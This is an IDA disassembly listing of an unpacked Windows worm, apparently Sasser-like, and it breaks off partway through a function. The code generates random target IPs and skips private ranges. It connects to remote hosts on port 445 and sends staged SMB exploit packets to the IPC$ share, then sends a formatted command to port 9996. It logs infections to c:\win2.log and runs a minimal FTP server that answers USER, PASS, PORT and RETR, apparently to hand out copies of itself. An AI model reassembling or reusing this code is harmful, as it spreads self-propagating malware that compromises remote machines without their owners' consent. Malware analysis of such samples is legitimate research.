;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : F317BC3530E09C2CF37553B1E12F0F56
; File Name : u:\work\f317bc3530e09c2cf37553b1e12f0f56_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40127D+7C�p
; sub_401EF0:loc_401F35�p ...
mov eax, ds:dword_406F30
imul eax, 343FDh
add eax, 279EC3h
mov ds:dword_406F30, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: sub_402029+1F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_406F30, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: sub_402029+24�p
var_190 = byte ptr -190h
sub esp, 190h
lea eax, [esp+190h+var_190]
push eax
push 101h
call ds:dword_405114 ; WSAStartup
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call ds:dword_40510C ; inet_addr
movsx ecx, al
mov [ebp+arg_0], eax
movsx edx, byte ptr [ebp+arg_0+2]
movsx esi, byte ptr [ebp+arg_0+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_40127D+9C�p
; sub_401EF0+1A�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+var_100]
push 0FFh
push eax
call ds:dword_405104 ; gethostname
test eax, eax
jnz short loc_401136
lea eax, [ebp+var_100]
push eax
call ds:dword_405110 ; gethostbyname
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax]
call ds:dword_405108 ; inet_ntoa
mov ebx, eax
push ebx
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call ds:dword_405018 ; lstrcpy
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401EF0+E2�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+var_10], 2
push 1BDh
call ds:dword_4050F4 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push 0
push eax
call sub_4021B0
add esp, 10h
push 6
push 1
pop ebx
push ebx
push 2
call ds:dword_4050F8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4011B4
xor al, al
jmp short loc_4011D1
; ---------------------------------------------------------------------------
loc_4011B4: ; CODE XREF: sub_401153+5B�j
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4011C8
xor bl, bl
loc_4011C8: ; CODE XREF: sub_401153+71�j
push esi
call ds:dword_40511C ; closesocket
mov al, bl
loc_4011D1: ; CODE XREF: sub_401153+5F�j
pop esi
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
sub_4011D5 proc near ; CODE XREF: sub_401153+30�p
; sub_40127D+34�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call ds:dword_40510C ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4011F2
test esi, esi
jnz short loc_401204
cmp byte ptr [edi], 30h
jz short loc_40120B
loc_4011F2: ; CODE XREF: sub_4011D5+12�j
push edi
call ds:dword_405110 ; gethostbyname
test eax, eax
jz short loc_401204
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_401204: ; CODE XREF: sub_4011D5+16�j
; sub_4011D5+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_40120B
xor esi, esi
loc_40120B: ; CODE XREF: sub_4011D5+1B�j
; sub_4011D5+32�j
mov eax, esi
pop edi
pop esi
retn
sub_4011D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401210 proc near ; CODE XREF: sub_40127D+F9�p
var_14 = byte ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
inc ds:dword_406F34
push edi
push ds:dword_406F34
lea eax, [ebp+var_14]
push offset aI ; "%i"
push eax
call ds:dword_4050E0 ; wsprintfA
add esp, 0Ch
push 0
push offset aCWin2_log ; "c:\\win2.log"
call ds:dword_405024 ; _lcreat
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40127A
lea eax, [ebp+var_14]
push esi
push eax
call sub_402210
mov esi, ds:dword_405020
pop ecx
push eax
lea eax, [ebp+var_14]
push eax
push edi
call esi ; _hwrite
push [ebp+arg_0]
call sub_402210
pop ecx
push eax
push [ebp+arg_0]
push edi
call esi ; _hwrite
push edi
call ds:dword_40501C ; _lclose
pop esi
loc_40127A: ; CODE XREF: sub_401210+37�j
pop edi
leave
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40127D proc near ; CODE XREF: sub_401A84+7B�p
var_348 = dword ptr -348h
var_33C = byte ptr -33Ch
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 33Ch
push ebx
push edi
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+var_10], 2
push 270Ch
call ds:dword_4050F4 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push ebx
push eax
call sub_4021B0
add esp, 10h
push 6
push 1
push 2
call ds:dword_4050F8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4012E2
xor al, al
jmp loc_401394
; ---------------------------------------------------------------------------
loc_4012E2: ; CODE XREF: sub_40127D+5C�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jz loc_40138B
push esi
call sub_401000
mov esi, eax
lea eax, [ebp+var_110]
push offset dword_406F38
push eax
call ds:dword_405018 ; lstrcpy
lea eax, [ebp+var_110]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_110]
push esi
push eax
push ds:off_406030
lea eax, [ebp+var_33C]
push eax
call ds:dword_4050E0 ; wsprintfA
lea eax, [ebp+var_33C]
xor esi, esi
push eax
call sub_402210
add esp, 1Ch
test eax, eax
jbe short loc_401373
loc_40134F: ; CODE XREF: sub_40127D+F4�j
push ebx
lea eax, [ebp+esi+var_33C]
push 1
push eax
push edi
call ds:dword_4050F0 ; send
lea eax, [ebp+var_33C]
inc esi
push eax
call sub_402210
cmp esi, eax
pop ecx
jb short loc_40134F
loc_401373: ; CODE XREF: sub_40127D+D0�j
push [ebp+arg_0]
call sub_401210
mov [esp+348h+var_348], 3E8h
call ds:dword_405028 ; Sleep
mov bl, 1
pop esi
loc_40138B: ; CODE XREF: sub_40127D+75�j
push edi
call ds:dword_40511C ; closesocket
mov al, bl
loc_401394: ; CODE XREF: sub_40127D+60�j
pop edi
pop ebx
leave
retn
sub_40127D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401398 proc near ; CODE XREF: sub_401A84+15�p
var_744 = byte ptr -744h
var_714 = byte ptr -714h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 744h
push ebx
push esi
push edi
push offset dword_406F38
push [ebp+arg_4]
call ds:dword_405018 ; lstrcpy
push [ebp+arg_0]
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call ds:dword_4050E0 ; wsprintfA
add esp, 0Ch
xor edi, edi
xor ecx, ecx
lea eax, [ebp+var_103]
loc_4013D1: ; CODE XREF: sub_401398+49�j
mov dl, [ebp+ecx+var_3C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4013D1
push 60h
lea eax, [ebp+var_B4]
push offset dword_4063E4
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_402290
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC+3)
push eax
call sub_402210
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
lea eax, [ebp+var_B1]
push eax
call sub_402290
lea eax, [ebp+var_3C]
push eax
call sub_402210
shl al, 1
add al, 9
push 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_87]
push eax
call sub_402290
add esp, 2Ch
push [ebp+arg_0]
call ds:dword_405110 ; gethostbyname
mov ebx, eax
cmp ebx, edi
jz loc_401554
push edi
push 1
push 2
loc_401495: ; DATA XREF: .text:off_4065D8�o
call ds:dword_4050F8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_401554
push 1BDh
mov [ebp+var_14], 2
call ds:dword_4050F4 ; htons
mov [ebp+var_12], ax
mov eax, [ebx+0Ch]
push 8
push edi
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_C]
push eax
call sub_4021B0
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h
push eax
push esi
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_401554
mov ebx, ds:dword_4050F0
push edi
push 89h
push offset dword_4061CC
push esi
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401554
push edi
mov edi, 640h
lea eax, [ebp+var_744]
push edi
push eax
push esi
mov esi, ds:dword_4050EC
call esi ; recv
push 0
push 0A8h
push offset dword_406258
push [ebp+arg_0]
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401554
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
push 0
push 0DEh
push offset dword_406304
push [ebp+arg_0]
call ebx ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401558
loc_401554: ; CODE XREF: sub_401398+F2�j
; sub_401398+10B�j ...
xor eax, eax
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401398+1BA�j
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
push 46h
lea esi, [ebp+var_714]
pop edi
loc_401570: ; CODE XREF: sub_401398+1F3�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
push offset aSC ; "%s%c"
push [ebp+arg_4]
call ds:dword_4050E0 ; wsprintfA
add esp, 10h
inc esi
inc esi
dec edi
jnz short loc_401570
push [ebp+arg_0]
call ds:dword_40511C ; closesocket
push 1
pop eax
loc_401599: ; CODE XREF: sub_401398+1BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_401398 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40159E proc near ; CODE XREF: sub_401A84+3B�p
; sub_401A84+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_4813 = byte ptr -4813h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
var_754 = byte ptr -754h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_C4 = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 89C4h
call sub_4025D0
mov eax, ds:dword_406A34
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, ds:dword_406A38
mov [ebp+var_10], eax
lea eax, [ebp+var_4C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call ds:dword_4050E0 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_113]
loc_4015D8: ; CODE XREF: sub_40159E+4A�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4015D8
push ebx
push esi
push edi
push 60h
lea eax, [ebp+var_C4]
push offset dword_4063E4
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
shl eax, 1
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_94]
push eax
call sub_402290
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_402210
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_C1]
push eax
call sub_402290
lea eax, [ebp+var_4C]
push eax
call sub_402210
shl al, 1
add al, 9
push 1
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_97]
push eax
call sub_402290
add esp, 2Ch
push 270Ch
call ds:dword_4050F4 ; htons
xor eax, 9999h
push 2
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push offset dword_4060E4
call sub_402290
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_40171A
cmp ebx, 2
jz short loc_40171A
push 7D0h
lea eax, [ebp+var_F24]
push 90h
push eax
call sub_4021B0
mov esi, offset loc_406034
push esi
call sub_402210
push eax
lea eax, [ebp+var_E84]
push esi
push eax
call sub_402290
lea eax, [ebp+var_14]
push eax
call sub_402210
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_768]
push eax
call sub_402290
add esp, 2Ch
imul ebx, 3Ch
mov eax, ds:dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_4017EE
; ---------------------------------------------------------------------------
loc_40171A: ; CODE XREF: sub_40159E+115�j
; sub_40159E+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi
push 90h
push eax
call sub_4021B0
imul ebx, 3Ch
push 4
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx
push eax
call sub_402290
mov esi, offset loc_406034
push esi
call sub_402210
push eax
lea eax, [ebp+var_24C4]
push esi
push eax
call sub_402290
push 4
lea eax, [ebp+var_21A0]
push offset dword_406A2C
push eax
call sub_402290
push 4
lea eax, [ebp+var_219C]
push ebx
push eax
call sub_402290
add esp, 40h
push esi
call sub_402210
push eax
lea eax, [ebp+var_2190]
push esi
push eax
call sub_402290
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4813]
loc_4017A6: ; CODE XREF: sub_40159E+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_4017A6
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi
push 31h
push eax
call sub_4021B0
push esi
lea eax, [ebp+var_68EC]
push 31h
push eax
call sub_4021B0
add esp, 18h
loc_4017EE: ; CODE XREF: sub_40159E+177�j
push 0
push 1
push 2
call ds:dword_4050F8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_401A7D
push 1BDh
mov [ebp+var_24], 2
call ds:dword_4050F4 ; htons
push [ebp+arg_0]
mov [ebp+var_22], ax
call sub_4011D5
mov [ebp+var_20], eax
xor ebx, ebx
push 8
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_4021B0
add esp, 10h
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jz loc_401A7D
mov esi, ds:dword_4050F0
push ebx
push 89h
push offset dword_4061CC
push edi
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push ebx
mov ebx, 640h
lea eax, [ebp+var_754]
push ebx
push eax
push edi
mov edi, ds:dword_4050EC
call edi ; recv
push 0
push 0A8h
push offset dword_406258
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0DEh
push offset dword_406304
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_C4]
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 68h
push offset dword_406448
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0A0h
push offset dword_4064B4
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
cmp [ebp+arg_4], 1
jz short loc_4019BB
cmp [ebp+arg_4], 2
jz short loc_4019BB
push 7Ch
lea eax, [ebp+var_1F08]
push offset dword_406558
push eax
call sub_402290
lea eax, [ebp+var_F24]
push 7D0h
push eax
lea eax, [ebp+var_1E8C]
push eax
call sub_402290
push 90h
lea eax, [ebp+var_16BC]
push offset off_4065D8
push eax
call sub_402290
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_401A5E
; ---------------------------------------------------------------------------
loc_4019BB: ; CODE XREF: sub_40159E+3B8�j
; sub_40159E+3BE�j
push 68h
lea eax, [ebp+var_89C4]
push offset dword_40666C
push eax
call sub_402290
lea eax, [ebp+var_4814]
push 1B5Ah
push eax
lea eax, [ebp+var_895C]
push eax
call sub_402290
push 70h
lea eax, [ebp+var_68EC]
push offset dword_4066D8
push eax
call sub_402290
lea eax, [ebp+var_3780]
push 0A5Eh
push eax
lea eax, [ebp+var_687C]
push eax
call sub_402290
push 84h
lea eax, [ebp+var_5DB8]
push offset dword_40674C
push eax
call sub_402290
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0FDCh
lea eax, [ebp+var_68EC]
loc_401A5E: ; CODE XREF: sub_40159E+418�j
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 3E8h
call ds:dword_405028 ; Sleep
push [ebp+var_4]
call ds:dword_40511C ; closesocket
loc_401A7D: ; CODE XREF: sub_40159E+264�j
; sub_40159E+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_40159E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A84 proc near ; CODE XREF: sub_402029+3A�p
var_84 = byte ptr -84h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_84]
push eax
push esi
call sub_401398
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401B05
lea eax, [ebp+var_84]
push offset dword_406A40
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401AC8
push 0
push esi
call sub_40159E
push 0
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AC8: ; CODE XREF: sub_401A84+36�j
lea eax, [ebp+var_84]
push offset dword_406A3C
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401AEB
push 1
push esi
call sub_40159E
push 1
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AEB: ; CODE XREF: sub_401A84+59�j
push 2
push esi
call sub_40159E
push 2
loc_401AF5: ; CODE XREF: sub_401A84+42�j
; sub_401A84+65�j
push esi
call sub_40159E
add esp, 10h
push esi
call sub_40127D
pop ecx
loc_401B05: ; CODE XREF: sub_401A84+1F�j
pop esi
leave
retn
sub_401A84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B08 proc near ; DATA XREF: sub_401E65+74�o
var_8E4 = byte ptr -8E4h
var_4E4 = byte ptr -4E4h
var_4E0 = byte ptr -4E0h
var_E4 = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+arg_0]
cmp ebx, 0FFFFFFFFh
jz loc_401E29
push esi
push edi
push 0
push ds:off_4068D0
call sub_402210
mov esi, ds:dword_4050F0
pop ecx
push eax
push ds:off_4068D0
push ebx
call esi ; send
mov edi, [ebp+arg_0]
jmp short loc_401B46
; ---------------------------------------------------------------------------
loc_401B43: ; CODE XREF: sub_401B08+310�j
mov ebx, [ebp+arg_0]
loc_401B46: ; CODE XREF: sub_401B08+39�j
push 0
lea eax, [ebp+var_4E4]
push 400h
push eax
push ebx
call ds:dword_4050EC ; recv
and [ebp+eax+var_4E4], 0
mov [ebp+var_10], eax
lea eax, [ebp+var_4E4]
push offset aUser ; "USER"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401B97
push 0
push ds:off_4068D4
call sub_402210
pop ecx
push eax
push ds:off_4068D4
jmp loc_401E11
; ---------------------------------------------------------------------------
loc_401B97: ; CODE XREF: sub_401B08+73�j
lea eax, [ebp+var_4E4]
push offset aPass ; "PASS"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401BC8
push 0
push ds:off_4068D8
call sub_402210
pop ecx
push eax
push ds:off_4068D8
jmp loc_401E11
; ---------------------------------------------------------------------------
loc_401BC8: ; CODE XREF: sub_401B08+A4�j
lea eax, [ebp+var_4E4]
push offset aPort ; "PORT"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz loc_401CA4
lea eax, [ebp+var_4E0]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402720
mov ax, ds:word_406A60
mov [ebp+var_4], ax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402680
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C17: ; CODE XREF: sub_401B08+159�j
test ebx, ebx
jz short loc_401C4B
cmp edi, 4
jge short loc_401C2E
push ebx
call sub_401E30
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C2E: ; CODE XREF: sub_401B08+116�j
jnz short loc_401C3A
push ebx
call sub_401E30
pop ecx
mov [ebp+var_18], eax
loc_401C3A: ; CODE XREF: sub_401B08:loc_401C2E�j
cmp edi, 5
jnz short loc_401C4E
push ebx
call sub_401E30
pop ecx
mov [ebp+var_14], eax
jmp short loc_401C4E
; ---------------------------------------------------------------------------
loc_401C4B: ; CODE XREF: sub_401B08+111�j
push 6
pop edi
loc_401C4E: ; CODE XREF: sub_401B08+135�j
; sub_401B08+141�j
lea eax, [ebp+var_4]
push eax
push 0
call sub_402680
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C17
push [ebp+var_2C]
mov edi, [ebp+var_18]
lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call ds:dword_4050E0 ; wsprintfA
add esp, 18h
push 0
push ds:off_4068E0
call sub_402210
pop ecx
push eax
push ds:off_4068E0
jmp loc_401DD7
; ---------------------------------------------------------------------------
loc_401CA4: ; CODE XREF: sub_401B08+D5�j
lea eax, [ebp+var_4E4]
push offset aRetr ; "RETR"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz loc_401DDC
push 0
push ds:off_4068E4
call sub_402210
pop ecx
